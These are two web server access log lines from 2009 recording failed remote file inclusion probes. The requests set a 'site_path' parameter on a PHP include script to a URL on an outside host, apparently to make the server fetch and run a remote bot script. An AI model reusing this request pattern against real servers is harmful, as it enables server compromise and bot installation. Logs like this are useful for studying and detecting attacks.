198.31.50.73 - - [22/Jun/2009:05:06:02 -0400] "GET /include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:05:06:02 -0400] "GET /logs/access_log.Q109050700/include/admin.lib.inc.php?site_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
